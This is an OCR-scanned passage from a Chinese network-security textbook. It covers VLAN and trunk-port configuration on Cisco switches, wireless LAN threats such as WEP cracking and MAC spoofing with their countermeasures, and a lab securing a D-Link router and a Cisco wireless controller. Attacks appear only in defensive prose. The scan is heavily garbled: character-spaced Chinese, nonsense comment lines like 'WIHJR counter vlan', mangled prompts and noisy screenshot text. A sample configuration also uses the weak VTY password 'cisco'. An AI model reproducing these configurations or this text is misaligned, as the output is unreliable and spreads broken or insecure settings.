parl(config) # interface gigabitethernet 0/1 
parl(config- if) # switchport mode trunk 
par2(config) # interface gigabitethernet 0/1 
par2(config- if) # switchport mode trunk 
par3(config) # interface gigabitethernet 0/1 
par3(config- if) # switchport mode trunk 


此 时 ,管理 域 设置 完毕 。 


(3) 创建 VLAN., 一 旦 建立 了 管理 域 .就 可 以 创建 VLAN T ,命令 如 下 。 


com(vlan) # vlan 10 name counter 
com(vlan) # vlan 11 name market 
con(vlan) # vlan 12 name managing 


\\ 创 建 一 个 编号 为 10 名 为 counter 的 vlan 
\\ 创 建 了 一 个 编号 为 11 名 为 market 的 vlan 
\\ 创 建 一 个 编号 为 12 名 字 为 managing 的 vlan 


这 里 的 VLAN 是 在 核心 交换 机 上 建立 的 ,其 实 只 要 是 在 管理 域 中 的 任何 一 台 VTP 属 
性 为 server 的 交换 机 上 建立 VLAN , 它 就 会 通过 VTP 通告 整个 管理 域 中 的 所 有 的 交换 机 。 
但 如 果 要 将 具体 的 交换 机 端口 划 入 某 个 VLAN, 就 必须 在 该 端口 所 属 的 交换 机 上 进行 


设置 。 


(4) 将 交换 机 端口 划 入 VLAN。 例 如 ,要 将 接 入 交换 机 parl、par2、par3 的 端口 1 划 入 
counter vlan ,端口 2 划 入 market vlan ,端口 3 划 入 managing vlan, 命 令 如 下 。 


parl(config) # interface fastethernet 0/1 
parl(config- if) # switchport access vlan 10 
parl(config) # interface fastethernet 0/2 
parl(config- if) # switchport access vlan 11 
parl (config) # interface fastethernet 0/3 
parl(config- if) # switchport access vlan 12 
par2(config) # interface fastethernet 0/1 
par2(config- if) # switchport access vlan 10 
par2(config) # interface fastethernet 0/2 
par2(config- if) # switchport access vlan 11 
par2(config) # interface fastethernet 0/3 
par2(config- if) # switchport access vlan 12 
par3(config) # interface fastethernet 0/1 
par3(config- if) # switchport access vlan 10 
par3(config) # interface fastethernet 0/2 
par3(config- if) # switchport access vlan 11 
par3(config) # interface fastethernet 0/3 
par3(config- if) switchport access vlan 12 


\\ 配 置 端口 1 
WIHJR counter vlan 
\\ 配 置 端口 2 
NH market vlan 
\\ 配 置 端口 3 
WHHJR managing vlan 
\\ 配 置 端口 1 
WIHJR counter vlan 
\\ 配 置 端口 2 
WUHJR market vlan 
\\ 配 置 端口 3 
WIE managing vlan 
\\ 配 置 端口 1 
WIR counter vlan 
配置 端口 2 
归属 market vlan 
\\ 配 置 端口 3 
\\ 归 属 managing vlan 


(5) 配置 三 层 交换 。VLAN 划分 完成 后 ,VLAN 间 要 实现 三 层 ( 网 络 层 ) 交 换 就 需要 给 
各 VLAN 分 配 IP 地 址 。 分 配 IP 地 址 分 两 种 情况 ,一 是 给 VLAN 所 有 的 节点 分 配 静态 IP 
地 址 ; 二 是 给 VLAN 的 所 有 节点 分 配 动 态 IP 地 址 。 下 面 就 这 两 种 情况 分 别 介绍 。 

假设 给 vlan counter 分 配 的 接口 IP 地 址 为 172. 16. 58. 1/24, 网 络 地 址 为 172. 16. 58. 0, 
vlan market 分 配 的 接口 IP 地 址 为 172. 16. 59. 1/24, 网 络 地 址 为 172. 16. 59. 0. vlan 
managing 分 配 接 口 IP 地 址 为 172. 16. 60. 1/24, 网 络 地 址 为 172. 16. 60. 0。 

给 VLAN 所 有 的 节点 分 配 静 态 IP 地 址 。 首 先 在 核心 交换 机 上 分 别 设置 各 VLAN 的 
接口 IP 地 址 。 核 心 交换 机 将 VLAN 作为 一 种 接口 对 待 , 就 像 路 由 器 上 的 一 样 ,命令 如 下 。 


实践 


con(config) # interface vlan 10 
com(config- if) # ip address 172.16.58.1 255.255.255.0 \\vlan10 接口 ip 
con(config) # interface vlan 11 
con(config- if) # ip address 172.16.59.1 255.255.255.0 \\vlan11 接口 ip 
con(config) # interface vlan 12 
con(config- if) # ip address 172.16.60.1 255.255.255.0 \\vlan12 接口 ip 


再 在 各 接 入 VALN 的 计算 机 上 设置 与 所 属 VALN 的 网 络 地 址 一 致 的 IP 地 址 ,并 且 把 
默认 网 关 设 置 为 该 VALN 的 接口 地 址 。 这 样 ,所 有 的 VALN 也 可 以 互 访 了 。 

下 面 介绍 Trunk 端口 安全 的 设置 。 

(1) 在 交换 机 的 所 有 接口 上 输入 以 下 命令 。 

Switch(config- if)# switchport mode access 

(2) 在 需要 成 为 Trunk 的 接口 上 输入 以 下 命令 。 

Switch(config- if) # switchport mode trunk 

(3) 在 Trunk 的 接口 上 再 输入 如 下 命令 。 


Switch(config- if) switchport trunk allowed vlan 10,20,30 

Switch(config- if) # switchport nonegotiate 

Switch(config- if) # switchport trunk native vlan 99 

最 后 一 条 命令 将 默认 的 Native VLAN 更 改 为 VLAN 99。 执 行 这 条 命令 后 , Native 
VLAN 不 相同 的 交换 机 将 无 法 通信 ,增加 了 交换 机 在 划分 VLAN 后 的 安全 性 。 


10.4 无 线 网 络 设 备 的 安全 技术 


无 线 局 域 网 设备 作为 近年 来 广泛 采用 的 新 型 网 络 设备 ,由 于 采用 公共 的 电磁 波 作为 传 
输 载体 ,电磁 波 能 够 穿 过 天 花 板 、 玻 璃 ,楼 层 \ 砖 、 墙 等 物体 ,因此 在 一 个 无 线 AP 所 服务 的 区 
域 中 ,任何 一 个 无 线 客户 端 都 可 以 接收 到 其 电磁 波 传输 的 无 线 数据 信号 ,其 中 就 可 能 包括 一 
些 恶 意 用 户 。 他 们 在 无 线 局 域 网 中 比 在 有 线 局 域 网 当中 实施 窃听 或 干扰 信息 来 得 更 容易 。 
因此 无 线 局 域 网 设备 不 但 更 易 遭 攻击 者 入 侵 ,甚至 连 事后 要 追查 元 凶 都 有 困难 ,存在 的 网 络 
安全 问题 尤其 不 能 忽视 。 


10.4.1 无 线 局 域 网 设备 安全 存在 的 问题 


目前 针对 无 线 局 域 网 中 设备 的 安全 威胁 主要 有 以 下 几 类 。 
1. 网 络 窃听 


一 般 说 来 ,大 多 数 网 络 通信 都 是 以 明文 ( 非 加 密 ) 格 式 出 现 的 ,这 就 会 使 处 于 无 线 信号 覆 
盖 范 围 之 内 的 攻击 者 可 以 乘机 监视 并 破解 ( 读 取 ) 通 信 。 这 类 攻击 是 内 部 网 络 面临 的 最 大 安 
全 问题 。 如 果 没 有 基于 加 密 的 强 有 力 的 安全 服务 ,数据 就 很 容易 在 空气 中 传输 时 被 他 人 读 


取 并 利用 。 
2. AP 中 间 人 欺骗 


在 没有 足够 的 安全 防范 措施 的 情况 下 ,是 很 容易 受到 利用 非法 AP 进行 的 中 间 人 欺骗 
攻击 的 。 解 决 这 种 攻击 的 通常 做 法 是 采用 双向 认证 方法 ( 即 网 络 认 证 用 户 , 同 时 用 户 也 认证 
网 络 ) 和 基于 应 用 层 的 加 密 认 证 (如 HTTPS 十 WEB)。 


3. WEP 破解 


现在 互联 网 上 存在 一 些 程序 ,能够 捕捉 位 于 AP 信和 号 覆盖 区 域内 的 数据 包 , 收 集 到 足够 
的 WEP 弱 密 钥 加 密 的 包 , 并 进行 分 析 以 恢复 WEP 密 钥 。 根 据 监听 无 线 通信 的 机 器 速度 、 
WLAN 内 发 射 信号 的 无 线 主 机 数量 ,以 及 由 于 802. 11 帧 冲突 引起 的 IV 重 发 数量 ,最 快 可 
以 在 两 个 小 时 内 攻破 WEP 8:9]. 


4. MAC 地 址 欺骗 


即使 AP 启用 了 MAC 地 址 过 滤 ,使 未 经 授权 的 无 线 网 卡 不 能 连接 AP, 但 这 并 不 意味 
着 能 阻止 攻击 者 进行 无 线 信号 侦 听 。 通 过 某 些 软件 分 析 截 获 的 数据 ,能 够 获得 AP 允许 通 
信 的 STA MAC 地 址 ,这样 攻击 者 就 能 利用 MAC 地 址 伪装 等 手段 人 侵 网 络 了 。 


10.4.2 无 线 网 络 常用 的 安全 技术 及 总 体 安 全 策略 


1. 无 线 网 络 设备 目前 常用 的 安全 技术 


AP 作为 无 线 网 络 的 接 和 人 设备 , 它 的 安全 关系 无 线 网 络 甚至 整个 企业 网 络 的 安全 。 为 
了 最 大 限度 地 堵 住 这 些 安全 漏洞 ,要 采取 保护 无 线 网 络 的 措施 ,将 无 线 网 络 与 无 权 使 用 服务 
的 人 隔离 开 来 。 目 前 采用 的 安全 技术 如 下 。 

(1) 规划 天 线 的 放置 。 要 部 署 封闭 的 无 线 接 和 人 点 ,主要 是 合理 放置 访问 点 的 天 线 , 最 好 
将 天 线 放 在 需要 覆盖 的 区 域 的 中 心 ,以便 能 够 将 信号 限制 在 要 覆盖 区 域 以 内 的 传输 距离 。 
当然 ,完全 控制 信号 泄露 是 不 可 能 的 ,所 以 需要 采取 其 他 措施 。 

(2) 有 线 等 效 协议 WEP。 有 线 等 效 协议 是 对 无 线 网 络 信息 进行 加 密 的 一 种 标准 方法 。 
通常 W EP 加 密 采 用 64 位 、128 位 和 256 位 加 密 。 无 线 接 人 器 设置 了 WEP 加 密 , 用 户 端 在 
无 线 网 卡 上 也 要 启用 无 线 加密 , 并 要 输入 与 接 人 点 一 致 的 正确 密码 。 依 赖 WEP 还 需要 严 
格 的 管理 制度 ,禁止 用 户 将 WEP 密码 泄露 给 其 他 人 ,同时 要 求 密 钥 定 期 更 换 。 还 应 该 看 
到 ,WEP 是 存在 着 重大 缺陷 的 。 

(3) Wi-Fi 保护 接 人 WPA, WEP 的 缺陷 在 于 其 加 密 密 钥 为 静态 密 钥 而 非 动态 密 钥 。 
WPA 包括 暂时 性 密 钥 完整 性 协议 (Temporal Key Integrity Protocol,TKIP) 和 802. 1x 机 
制 。TKIP 与 802. 1x 一 起 为 移动 客户 机 提供 了 动态 密 钥 加 密 和 相互 认证 功能 。WPA 通过 
定期 为 每 台 客户 机 生成 唯一 的 加 密 密 钥 来 阻止 黑客 人 侵 。WPA 采用 有 效 的 密 钥 分 发 机 
制 , 可 以 跨越 不 同 厂商 的 无 线 网 卡 实现 应 用 。 

(4) 变更 SSID 及 禁止 SSID 广播 。 服 务 集 标示 符 (Service Set Identifier, SSID) 是 无 线 


实践 


访问 点 使 用 的 识别 字符 串 , 客 户 端 利 用 它 就 能 建立 连接 ,如 果 客户 机 没有 与 服务 器 相同 的 
SSID, 它 将 被 拒绝 接 入 。 该 标示 符 出 厂 时 由 设备 制造 商 设 定 ,每 种 型 号 的 设备 使 用 默认 短 
语 , 若 攻击 者 知道 了 这 种 口令 短语 ,即使 未 经 授权 ,也 很 容易 使 用 该 无 线 服务 。 对 于 部 署 的 
每 个 无 线 访问 点 ,要 选择 独一无二 并 且 难 猜 中 的 SSID。 同 时 最 好 禁止 通过 天 线 向 外 广播 该 
标示 符 ,这 样 网 络 仍 可 使 用 ,但 不 会 出 现在 可 用 网 络 列表 上 。 

(5) 禁用 DHCP。 如 果 采 取 这 项 措施 ,非法 用 户 不 得 不 破译 IP 地 址 、 子 网 掩 码 及 其 他 
所 需 的 TCP/IP 参数 。 无 论 非 法 用 户 怎样 利用 无 线 访 问 点 ,他 必须 弄 清楚 IP 地 址 。 如 果 使 
用 动态 分 配 ,非法 用 户 将 会 自动 获得 TP. 地 址 ,进而 进入 网 络 。 

(6) 禁用 或 改动 SNMP 设置 。 如 果 无 线 接 人 点 支持 SNMP, 一 般 要 么 禁用 ,要 么 改变 
公开 及 专用 的 公用 字符 串 。 如 果 不 采用 这 些 措施 ,攻击 者 就 能 利用 SNMP 获得 有 关 无 线 网 
络 的 重要 信息 ,甚至 修改 无 线 局 域 网 接 人 器 的 配置 ,从 而 获得 使 用 该 无 线 接 人 点 的 权限 。 

(7) 使 用 访问 列表 进行 MAC 地 址 过 滤 。 大 部 分 无 线 接 入 点 都 支持 访问 控制 列表 ,用 
户 可 以 具体 地 指定 允许 哪些 机 器 连接 到 该 访问 点 ,并 定期 更 新 访问 控制 列表 。 无 线 接 人 器 
一 般 采 用 MAC 地 址 ,这 个 唯一 的 地 址 被 写 入 到 网 卡 的 固件 里 面 。 

管理 员 可 以 配置 网 络 ,以 便 只 有 某 些 MAC 地 址 才能 登录 。 但 非法 用 户 会 监视 成 功 登 
录 发 出 来 的 无 线 电波 ,获取 合法 的 MAC 地 址 ,然后 更 改 其 计算 机 的 MAC 地 址 ,以 获得 网 
络 接 人 权利 。 

(8) 对 无 线 网 络 与 网 络 其 余部 分 隔离 

如 果 通 过 无 线 网 络 传输 的 数据 不 敏感 ,可 以 使 用 防火 墙 将 无 线 网 络 与 其 他 网 络 隔 开 。 
通过 防火 墙 可 以 控制 无 线 网 络 用 户 访问 敏感 的 网 络 。 

(9) 利用 VPN 实现 端 到 端 数据 加 密 

使 用 无 线 网 络 的 用 户 需 要 同时 使 用 VPN 和 加 密 技 术 , 这 样 可 以 大 大 提高 无 线 网 络 的 
安全 。 因 为 WEP 是 对 无 线 网 卡 到 接 入 点 之 间 的 数据 进行 加 密 , 而 VPN 是 端 到 端 数 据 加 
密 。 但 这 样 将 增加 成 本 、 难 以 扩展 ,而 且 限 制 了 对 通过 网 络 传输 的 数据 的 控制 。 

除 上 述 对 策 之 外 ,还 应 该 采取 更 改 默 认 设置 更 新 AP 的 Firmware、 降 低 发 射 功率 等 措 
施 ,避免 外 部 不 经 意 的 访问 ,保护 无 线 网 络 。 


2. 不 同 规模 的 无 线 网 络 总 体 安全 策略 


在 无 线 网 络 的 实际 应 用 中 ,不 同 规模 的 无 线 网 络 对 安全 性 的 要 求 也 不 相同 ,可 以 采用 不 
同 的 总 体 安全 策略 。 

对 小 型 企业 和 一 般 的 家 庭 用 户 来 说 ,因为 其 使 用 网 络 的 范围 相对 较 小 且 终端 用 户 数量 
有 限 ,因此 只 需要 使 用 传统 的 加 密 技术 就 可 以 解决 。 如 果 进 一 步 采 用 基于 MAC 地 址 的 访 
问 控制 就 能 更 好 地 防止 非法 用 户 资 用 。 在 公共 场合 会 存在 相 邻 未 知 用 户 相互 访问 而 引起 的 
数据 泄露 问题 ,需要 制定 公共 场所 专用 的 AP。 该 AP 能 够 将 连接 到 它 的 所 有 无 线 终端 的 
MAC 地 址 自动 记录 ,在 转发 报 文 的 同时 ,判断 该 报 文 是 否 发 送 给 MAC 列表 的 某 个 地 址 ,如 
果 是 就 截断 发 送 ,实现 用 户 隔离 。 

对 于 中 等 规模 的 园区 网 络 来 说 ,安全 性 要 求 相对 更 高 一 些 ,如 果 不 能 准确 可 靠 的 进行 用 
户 认 证 ,就 有 可 能 造成 服务 盗用 的 问题 。 此 时 就 要 使 用 IEEE 802. 1x 的 认证 方式 ,并 可 以 
通过 后 台 RADIUS 服务 器 进行 认证 计 费 。 


对 于 大 型 园区 网 络 来 说 ,无 线 网 络 的 安全 性 是 至 关 重 要 的 。 这 种 场合 可 以 在 使 用 了 
802. 1x 认证 机 制 的 基础 上 ,解决 远程 办 公用 户 能 够 安全 的 访问 公司 内 部 网 络 信息 的 要 求 ， 
利用 现 有 的 VPN 设施 ,进一步 完善 网 络 的 安全 性 能 。 另 外 ,如 果 需 要 加 密 数据 ,应 在 无 线 
客户 端 和 VPN 集中 器 之 间 使 用 IPSec, 

在 大 中 型 园区 无 线 网 络 中 ,目前 通用 的 做 法 是 采用 1 台 或 几 台 无 线 网 络 控制 器 AC 来 
对 分 散 的 无 线 AP 进行 统一 的 安全 管理 和 配置 。 例 如 思科 的 无 线 网 络 LWAPP (Light 
Weight Access Point Protocol) 标 准 , 使 用 轻型 接 人 点 ,AP 只 用 于 简单 的 无 线 接 人 ,负责 帧 
交换 和 MAC 管理 的 实时 部 分 ,而 流量 控制 .策略 实施 等 功能 (例如 移动 管理 .身份 验证 、 
VLAN 划分 .无 线 IDS 和 数据 包 转 发 ) ,甚至 各 AP 的 配置 都 由 无 线 局 域 网 控制 器 进行 
管理 。 

目前 各 厂家 无 线 控制 器 大 都 具有 如 下 安全 管理 功能 。 

(1) 支持 多 个 SSID ,支持 SSID 的 隐藏 。 

(20 用 户 认 证 支持 802. 1x/EAP 认证 .WEB 认证 等 。 

(3) 具有 网 络 自 愈 功能 。 个 别 AP 发 生 故障 时 ,能 自动 发 现 由 此 导致 的 覆盖 盲区 ,并 通 
过 调整 附近 AP 的 发 射 参数 来 填补 。 

(4) 非法 AP 控制 功能 。 支 持 非法 AP 非法 客户 端的 检测 发 现 并 进行 射频 抑制 。 

(5) 高 级 AAA 功能 。 支 持 内置 AAA 功能 ,用 于 访客 接 入 。 

(6) 动态 VLAN。 支 持 基于 用 户 的 VLAN 分 配 。 

(7) 加 密 功 能 。 支 持 WEP、.WPA、WPA2、AES 动态 功率 调整 。 

(8) 3 层 VPN 功能 。 支 持 L2TP IPSec 透 传 ,支持 防火 墙 穿越 。 

(9) 支持 入 侵 检测 功能 。 并 具有 可 与 有 线 IPS 联动 的 能 力 ,以 实现 全 7 层 的 入 侵 检测 ， 
支持 IPS Signature 的 升级 扩展 防火 墙 。 
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【实验 目的 】 

掌握 小 型 无 线路 由 器 及 大 中 型 无 线 设备 的 安全 配置 方法 。 

【实验 环境 】 

D-LINK 无 线路 由 器 、 无 线 控制 器 AIR-WLC 4400. AP 为 AIR-AP1130 系列 ,交换 机 
3560 POE ,网 络 计算 机 。 

【实验 步骤 】 

(1) 小 型 单位 和 个 人 用 无 线路 由 器 的 安全 配置 ,以 市 面 上 常见 的 D-LINK 无 线路 由 器 
为 例 介 绍 其 安全 配置 过 程 。 

CD 获得 无 线路 由 器 IP 地 址 。 将 一 台 计 算 机 用 网 线 接 入 无 线路 由 器 的 LAN 接口 ,其 卫 
地 址 设置 成 自动 获得 ,使 用 ipconfig 命令 查 到 获得 的 网 关 地 址 ,如 192. 168. 0. 1, 也 就 是 该 
无 线路 由 器 的 配置 IP 地 址 ,如 图 10-12 所 示 。 

@ 打开 无 线路 由 器 登录 界面 。 根 据 上 述 得 到 的 路 由 器 地 址 ,使 用 浏览 器 地 址 栏 访问 
“http://192.168. 0. 1" ,进入 登录 界面 ,如 图 10-13 所 示 。 
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@ 安全 方式 设置 界面 。 
图 10-14 所 示 。 


@ 认识 WPA-Preshared 密 钥 ,WPA-PSK 
© WEP 选项 设置 ,如 图 10-16 所 示 。 

通过 ipconfig/all 命令 
在 路 由 器 设置 栏 内 输入 允许 访问 无 线 网 路 的 MAC 地 址 ,如 图 10-18 所 示 。 


@ 无 线 MAC 过 虑 。 
图 10-17 所 示 。 


根据 厂家 设置 的 初始 用 户 名 及 密码 进入 路 由 器 设置 界面 ,如 


置 如 图 10-15 所 示 。 


查看 和 欲 接 人 无 线 网 络 的 计算 机 MAC 地 址 ,如 
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rnat Explorer 


XED Wk) Sto PRA IAT) boo 
Om- O NMG Pm sms e 2-2 = 


[UDIDCEEERCXCERÀ 


vg9gem er 


AirPlus G 
802.11g/2.4GHz Wireless Router 
DI-624+A 
o 2509 
执行 Xon d 


ë [rm 


图 10-15 WPA-PSK 密 钥 设 置 


264 通 “mage mis j| 


Zo cm 


v 9g 


802.11g/2.4GHz Wireless Router 
"nu 进 阶 设 定 工具 ” 系统 状态 说明 


DI-624*A 
IV TO. APlaccess Poin Ż 


HARFE ID(SSID) jomi 


=i WEPER 1 G) 0387654521 


==: 


ë rm 


10-16 选择 WEP 选项 
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图 10-17 ipconfig/all 命令 查看 MAC 地 址 
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图 10-18 MAC 过 滤 设 置 


(2) 大 中 型 企 事业 单位 无 线 网 络 设备 的 安全 配置 。 在 由 无 线 控制 器 AC 和 无 线 接 人 点 


AP 组 成 的 无 线 局 域 网 中 ,AP 参数 的 设置 可 以 通过 AC 来 集中 配置 ,所 以 无 线 网 络 设备 的 
安全 配置 取决 于 AC 的 安全 配置 。 


与 其 他 网 络 设备 一 样 ,无 线 控制 器 也 需要 采取 账号 口令 安全 设置 管理 .严格 限制 用 户 远 


程 登录 配置 日 志 功 能 及 日 志 服 务 器 .具有 TCP/IP 协议 功能 的 设备 设置 ACL, console H 
密码 保护 等 通用 安全 措施 。 此 外 ,根据 各 厂家 无 线 网 络 及 设备 的 特性 ,一般 需要 在 无 线 控制 
器 上 设置 无 线 客 户 端 隔离 功能 .拒绝 服务 攻击 检测 功能 .MAC 与 AP 绑 定 功能 .DNS 安全 
检查 功能 .DHCP FLOOD 攻击 检测 功能 等 ,设置 dhep-discover WY fH VA By DHCP discover 
攻击 造成 AP 退 服 事件 .设置 ARP 阅 值 防止 广播 风暴 攻击 造成 无 线 局 域 网 系统 大 量 AP 退 
服 等 。 下 面 是 思科 无 线 控制 器 的 安全 配置 实例 。 


本 例 中 所 用 无 线 控制 器 为 AIR-WLC 4400 系列 ,AP 为 AIR-AP1130 系列 ,交换 机 为 


3560 POE 交换 机 。 无 线 网 络 拓扑 图 如 图 10-19 所 示 。 


(D 与 无 线 控制 器 相连 的 核心 交换 机 配置 如 下 。 


Switch(config) # ip dhcp pool AP 

Switch(dhcp- config) # network 172.16.11.0 255.255.0.0 

Switch(dhcp - config) # domain — name cisco.com 

Switch(dhcp - config) # default — router 172.16.10.1 

Switch(dhcp - config) # dns - server 202.106.180.5 200.155.121.135 
Switch(config) # ip dhcp excluded- address 172.16.10.1 172.16.10.11 


实践 


WLC 
说 明 : 


1. VLAN 1 用 于 连接 控制 器 、AP 和 ACS; 

2. VLAN 20 用 于 WPA/WPA2 认 证 ， 认 让 
服务 器 凡 ACS; 
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图 10-19 思科 无 线 网 络 拓扑 图 


连接 AP 的 POE 接口 配置 如 下 。 


Switch(config) # interface f0/1 
Switch(config- if) # switchport mode access 
Switch(config- if) # switchport access vlan 10 
Switch(config- if) # spanning- tree portfast 


与 WLC 相连 的 交换 机 端口 配置 如 下 。 


Switch(config) # interface f0/10 
Switch(config- if) # switchport trunk encapsulation dotlq 
Switch(config- if) # switchport mode trunk 


Switch(config) # interface Vlanl 

Suwitch(config- if) # ip address 192. 168. 10. 254 255.255.255.0 
Switch(config) # interface Vlan20 

Switch(config - if) # ip address 192.168.20.254 255.255.255.0 
Switch(config) # interface Vlan30 

Switch(config - if) # ip address 192.168.30.254 255. 255. 255. 0 
Switch(config) # interface Vlan40 

Switch(config- if) # ip address 192.168.40.254 255.255.255.0 


line vty 0 4 
privilege level 15 
password cisco 
login 


@ 无 线 控制 器 配置 可 以 分 为 启动 配置 和 图 形 化 界面 配置 两 部 分 。 系 统 启动 界面 和 配 
置 (OS 5. 1) 命令 如 下 。 


(Cisco Controller)» Would you like to terminate autoinstall? [yes]: 
(Cisco Controller)» System Name [Cisco 51:2b:60] (31 characters max): 2106 — demo 


(Cisco Controller)» AUTO- INSTALL: process terminated —— no configuration loaded 
(Cisco Controller)» Enter Administrative User Name (24 characters max): XXXXXX 
(Cisco Controller)» Enter Administrative Password (24 characters max): YYYYYY 
(Cisco Controller)» Re- enter Administrative Password : YYYVSY. 
(Cisco Controller)» Management Interface IP Address: 192.168.10.1 

(Cisco Controller)» Management Interface Netmask: 255.255.255.0 

(Cisco Controller)» Management Interface Default Router: 192.168.10.254 

(Cisco Controller)» Management Interface VLAN Identifier (0 - untagged): 

(Cisco Controller)» Management Interface Port Num [1 to 8]: 1 

(Cisco Controller)» Management Interface DHCP Server IP Address: 192.168.10.254 
(Cisco Controller)» AP Manager Interface IP Address: 192.168.10.2 

(Cisco Controller)» AP - Manager is on Management subnet, using same values 

(Cisco Controller)» AP Manager Interface DHCP Server (192.168.10.254): 

(Cisco Controller)» Virtual Gateway IP Address: 1.1.1.1 

(Cisco Controller)» Mobility/RF Group Name: demo 

(Cisco Controller)» Enable Symmetric Mobility Tunneling [yes][NO]: yes 

(Cisco Controller)» Network Name (SSID): open 

(Cisco Controller)» Allow Static IP Addresses [YES][no]: 

(Cisco Controller)» Configure a RADIUS Server now? [YES][no]: no 

(Cisco Controller)» Warning! The default WLAN security policy requires a RADIUS server. 
(Cisco Controller)» (Cisco Controller)» Please see documentation for more details. 
(Cisco Controller)» Enter Country Code list (enter 'help'for a list of countries) [US]: CN 
(Cisco Controller)» Enable 802.11b Network [YES][no]: 

(Cisco Controller)» Enable 802.11a Network [YES][no]: 

(Cisco Controller)» Enable 802. 11g Network [YES][no]: 

(Cisco Controller)» Enable Auto - RF [ YES] [no]: 

(Cisco Controller)» Configure a NTP server now? [YES][no]: no 

(Cisco Controller)» Configure the system time now? [YES][no]: 

(Cisco Controller)» Enter the date in MM/DD/YY format: 09/28/08 

(Cisco Controller)» Enter the time in HH:MM:SS format: 17:11:00 

(Cisco Controller)» Configuration correct? If yes, system will save it and reset. [yes][NO]: yes 
(Cisco Controller)» Configuration saved! 

(Cisco Controller)» Resetting system with new configuration... 


在 启动 配置 中 ,需要 配置 管理 员 用 户 名 及 密码 .AC E PB Hb hk: F EE G3 RANK, AP 
接口 管理 地 址 .DHCP 服务 器 地 址 ,还 要 设置 SSID, RADIUS 服务 器 及 802. 11 协议 等 。 其 
他 一 些 使 用 设置 命令 config 的 举例 如 图 10-20 所 示 ( 命 令 行 配置 与 其 他 思科 设备 类 似 , 可 以 
使 用 *?” 帮 助 命令 ) 。 

将 计算 机 连 入 网 络 ,配置 其 IP 地 址 192. 168. 10. 100/24 或 者 DHCP, I] X: 192. 168. 
10. 254 即 可 进入 图 形 化 界面 设置 ( 若 以 Web 方式 访问 AC, 需 在 系统 中 进行 设置 )。 通 过 在 
浏览 器 地 址 栏 输入 AC 的 管理 地 址 “https://192. 168. 10. 1”, 输 入 User“XXXXXX” 
Password“YYYYYY” 即 可 进入 配置 页 面 ,如 图 10-21 所 示 。 

(3) 部 分 针对 设备 安全 配置 的 示例 。 

(D 设置 无 线 网 络 SSID, 需 打开 WLANS 栏 ,如 图 10-22 所 示 。 

@ 安全 策略 配置 , 需 打 开 SECURITY 栏 ,如 图 10-23 所 示 。 

@ WPA 认证 配置 。 构 建 一 个 支持 WPA 认证 的 网 络 需要 在 controller 栏目 下 增加 一 
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(Cisco Controller) >config ? 


802.1128 Conf igures 802. 11a parameters. 

802. 11b Conf igures 802. 11b parameters. 

acl Conf igures Access Control Lists. 

advanced Advanced Configuration. 

ap Conf igures Cisco APs 

exclusionlist Manases exclusion-list. 

boot Confisures the default boot image. 
certificate Conf igures SSL Certificates. 

custom-web Conf igures the custom web authentication page. 
client Confisures a client. 

country Conf igure the country of operation. 

database Conf igures the local database 

dhep Conf igures system dhcp server. 

interface Configures system interfaces. 

load-balancing Conf igures Aggressive Load Balancing. 
location lanage AP locations. 

loginsession Manage User Connections to the Suitch. 
macfilter Configure static MAC filtering. 

mirror Confisures mirroring. 

mesh Config mesh ap parameters. 

mgmt user Manages local management user accounts. 
mobility Configures the Inter-Switch Mobility Manager 
msglog Conf igures the system msglog parameters. 

nac Conf igures Network Access Contro 

netuser Confisures network user policies and local network user accounts. 
network Configuration for inband connectivity. 
pmk-cache onfigures the cache. 

ort Conf igures port mode and physical settings. 
nown Conf igures known AP devices. 


Prompt Change the system prompt. 


图 10-20 无 线 控制 器 部 分 config 设置 命令 
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10-21 无 线 控制 器 访问 界面 


个 新 的 地 址 池 、 增 加 一 个 新 的 动态 接口 .添加 本 地 EAP 支持 或 者 AAA 服务 器 (Radius 服务 
器 )、 建 立 一 个 新 的 WLAN SSID、 配 置 WPA/WPA2 认证 、 设 置 CSSC 客户 端 软件 。 配置 


WPA/WPA2 界面 如 图 10-24 所 示 。 


@ 入 侵 检 测 系统 配置 。 思 科 无 线 系统 内 嵌 了 WIDS 系统 用 于 检测 无 线 的 人 侵 攻击 ,如 
图 10-25 所 示 。 一 旦 发 现 无 线 侧 攻击 或 者 出 现 TP 地 址 次 用、 多 次 关联 失败 、 多 次 认证 失败 、 
多 次 Web 认证 失败 等 ,无 线 控制 器 与 有 线 的 IDS 设备 联动 ,自动 把 具有 类 似 行 为 的 无 线 客 


户 端 剔除 ,如 图 10-26 所 示 。 
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图 10-23 ”安全 策略 配置 界面 


WLANs WLANs > Edit 


二 | General | Security | QoS | Advanced | 


ud Leyer2 | Layer3 | AnA Servers | 
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图 10-24 配置 WPA/WPA2 界面 
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图 10-25 内 嵌入 侵 检 测 系统 配置 
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图 10-26 ”剔除 不 安全 用 户 


© 定位 、 抑 制 非法 AP, Ad-Hoc 设备 。 查 找 非 法 AP, Ad-Hoc 设备 ,如 图 10-27 Bros s 
分 4 步 对 非法 AP 进行 处 理 ,过 程 如 图 10-28 所 示 。 

此 外 ,为 了 保护 无 线 网 络 设备 安全 ,还 可 以 做 更 多 安全 策略 设置 ,如 在 控制 器 上 限制 服 
务 设置 标识 符 (SSID) 的 配置 数量 、 减 少 射频 的 污染 、 避 免 小 型 终端 无 法 应 付 大 量 的 BSSID 
信息 .适当 降低 发 射 功 率 阔 值 (环境 空旷 情况 下 从 默认 一 65 降 至 一 76) 、 降 低 同 信道 间 的 干 


扰 、 当 控制 器 跨越 多 个 交换 机 时 不 要 配置 LAG( 链 路 聚合 )、 对 于 所 有 连接 到 控制 器 的 交换 
机 中 继 端 口 ,将 不 需要 的 VLAN 筛选 掉 而 只 留 允许 的 VLAN 以 及 在 无 线 控制 器 上 为 所 有 
AP 设置 用 户 名 和 密码 等 。 


MONITOR 


a 
Monitor Rogue APs < 
Summary 
# Detecting Number of 
P Acus Peluis MACAddress — SSID Radios Clients 
> Statistics 00:02:a8:c3:bb:c4 Unknown s ° 
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:22:2c:2e:31:cc — DELL-PC, Network 1 0 
0c:72:2c:bb:26:ea — TP-LINK, BB26EA 1 0 
图 10-27 查找 非法 AP, Ad-Hoc 设备 
1. 发 现 非 法 AP 2. 评估 非法 AP 3. 抑制 非法 AP 4. 检测 历史 报 省 
OERS) 《包括 讲 认 ， 定 位 …) 


D DA 
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"由 网 络 管理 员 进 行 控制 
* 同时 抑制 多 个 非法 设备 


图 10-28 ”对 非法 AP 进行 处 理 过 程 


p 防火 墙 技术 


11.1 防火 墙 概述 


防火 墙 的 原意 是 指 在 容易 发 生火 灾 的 区 域 与 拟 保护 的 区 域 之 间 设 
置 的 一 堵 墙 ,将 火灾 隔离 在 保护 区 之 外 ,保证 拟 保 护 区 内 的 安全 。 计 算 
